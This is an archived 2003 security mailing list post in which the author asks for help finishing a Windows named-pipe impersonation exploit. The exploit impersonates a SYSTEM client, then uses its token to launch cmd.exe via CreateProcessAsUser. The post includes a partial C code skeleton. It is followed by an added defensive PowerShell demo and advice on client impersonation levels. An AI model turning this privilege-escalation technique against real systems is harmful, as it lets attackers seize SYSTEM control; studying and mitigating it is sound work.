Named Pipe Impersonation -> CreateProcessAsUser();

From: wirepair (wirepair_at_roguemail.net)
Date: 07/14/03

  • Next message: Blue Boar: "Re: Named Pipe Impersonation -> CreateProcessAsUser();"
    To: vuln-dev@securityfocus.com
    Date: Mon, 14 Jul 2003 12:45:37 -0700

    Hello, I'm attempting to finish up my exploit for the
    @stake advisory; I've hit quite a snag when I found out
    that calling a new process does not inherit the privileges
    of the named pipe. (I must have been thinking of fork() or
    something, heh.) So I can impersonate SYSTEM, but I can not
    create a new process with these nice privileges. Here is
    where I am at:
    ConnectNamedPipe() <-- yada yada wait for connection
    if (!ImpersonateNamedPipeClient(hPipe)) // impersonate the pipe so we now are SYSTEM.
    {
        printf("Failed to impersonate the named pipe.\n");
        CloseHandle(hPipe);
        return 5;
    }
    // found this on msdn, i'm trying to get a token with full access,
    // then call CreateProcessAsUser();
    if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken)) {
        if (hToken != INVALID_HANDLE_VALUE) {
            CloseHandle(hToken);
            printf("damn: %u\n", GetLastError());
        }
    }

    // this i'm kinda shady on, looks like i'm just mapping the id to the
    // SYSTEM name? when i call GetUserName i get garble after the
    // OpenThreadToken unless i call MapGenericMask...
    MapGenericMask(&dwAccessDesired, pGeneric);

    CreateProcessAsUser(hToken, "cmd.exe", NULL, NULL, NULL, true, NULL, NULL, NULL, &si, &pi);
    CloseHandle(hPipe);

    Now I call CreateProcessAsUser, using the token from
    OpenThreadToken. In the debugger, it tries to execute cmd,
    but I get nothing back... If anyone wants to see my
    code it's at http://sh0dan.org/files/tac0tac0.c... Thanks,
    this is starting to bug me :),
    -wire
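The post above is about a pipe server impersonating whoever connects to it. The client side of that exchange decides how far the impersonation can go, which is the mitigation a pipe client should know about. The script below is an added illustration written for this page; it is not code from wirepair's post or from the tac0tac0.c file. It assumes a Windows host with .NET available to PowerShell, and the pipe name is a constructed value. It starts a pipe server, connects to it twice, and has the server report the impersonation level it actually received: once with TokenImpersonationLevel.Identification, which lets a server learn who the client is but not act as that client (Windows rejects attempts to run code or start processes under such a token with ERROR_BAD_IMPERSONATION_LEVEL), and once with full Impersonation, the level that makes the sequence in the post possible.

```powershell
# Added example (not from wirepair's post or tac0tac0.c). Assumes Windows + .NET.
# The pipe name is a constructed value; nothing here touches a real service pipe.
$pipeName = 'demo-impersonation-' + [guid]::NewGuid().ToString('N')

function Get-ClientImpersonationLevel {
    param(
        [string] $PipeName,
        [System.Security.Principal.TokenImpersonationLevel] $ClientLevel
    )

    # Server end: a single instance, asynchronous so WaitForConnectionAsync
    # does not block this thread before the client has a chance to connect.
    $server = New-Object System.IO.Pipes.NamedPipeServerStream(
        $PipeName,
        [System.IO.Pipes.PipeDirection]::InOut,
        1,
        [System.IO.Pipes.PipeTransmissionMode]::Byte,
        [System.IO.Pipes.PipeOptions]::Asynchronous)
    $pending = $server.WaitForConnectionAsync()

    # Client end: the last constructor argument is the security setting that
    # matters. It is the .NET form of passing SECURITY_SQOS_PRESENT together with
    # SECURITY_IDENTIFICATION (or SECURITY_IMPERSONATION) to CreateFile in Win32.
    $client = New-Object System.IO.Pipes.NamedPipeClientStream(
        '.',
        $PipeName,
        [System.IO.Pipes.PipeDirection]::InOut,
        [System.IO.Pipes.PipeOptions]::None,
        $ClientLevel)
    $client.Connect(5000)
    $pending.Wait()

    # The server now impersonates its client (what ImpersonateNamedPipeClient does
    # in Win32) and records the impersonation level the client actually granted.
    # A hashtable is used so the delegate can write back into this scope.
    $result = @{ Level = $null }
    $server.RunAsClient([System.IO.Pipes.PipeStreamImpersonationWorker]{
        $result.Level = [System.Security.Principal.WindowsIdentity]::GetCurrent().ImpersonationLevel
    })

    $client.Dispose()
    $server.Dispose()
    return $result.Level
}

# Connect once at each level and show what the server ends up holding.
foreach ($level in 'Identification', 'Impersonation') {
    $observed = Get-ClientImpersonationLevel -PipeName $pipeName -ClientLevel $level
    'client asked for {0,-14} -> server token level: {1}' -f $level, $observed
}
```

For a C client like the ones in the post's own API vocabulary, the equivalent control is the dwFlagsAndAttributes argument of CreateFile: a client that opens the pipe with SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION hands the server a token it can inspect but not act with, which is the default a privileged client should choose unless the server legitimately needs to work on its behalf.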

